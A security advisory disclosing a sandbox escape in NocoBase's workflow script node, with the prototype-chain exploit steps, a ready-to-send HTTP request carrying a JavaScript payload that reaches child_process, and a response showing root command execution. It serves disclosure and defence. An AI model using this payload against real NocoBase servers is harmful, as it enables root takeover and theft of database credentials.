GHSA-px3p-vgh9-m57c

## Summary

NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr.

An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.

Exploit Chain

1. console._stdout.constructor.constructor → host-realm Function constructor
2. Function('return process')() → Node.js process object
3. process.mainModule.require('child_process') → unrestricted module loading
4. child_process.execSync('id') → RCE as root

This completely bypasses the customRequire allowlist.

Impact

• Remote Code Execution as root (uid=0) inside Docker container
• Database credential theft (DB_PASSWORD, INIT_ROOT_PASSWORD from process.env)
• Arbitrary file read/write via require('fs')
• Reverse shell confirmed
• Outbound network access for lateral movement

Proof of Concept

HTTP Request:

POST /api/flow_nodes:test Authorization: Bearer <JWT_TOKEN> Content-Type: application/json

{ "type": "script", "config": { "content": "const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('id').toString().trim();", "timeout": 5000, "arguments": [] } }

Response:

{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}

Environment

• Docker image: nocobase/nocobase:latest
• NocoBase CLI: v2.0.26
• Node.js: v20.20.1
• OS: Debian GNU/Linux 12 (bookworm)

PoC

Got reverse shell

<img width="1300" height="743" alt="Screenshot 2026-03-26 at 06 09 51" src="https://github.com/user-attachments/assets/fcb65346-2d98-485a-a849-153d5957c78e" />

Proof of concept the root privileges

<img...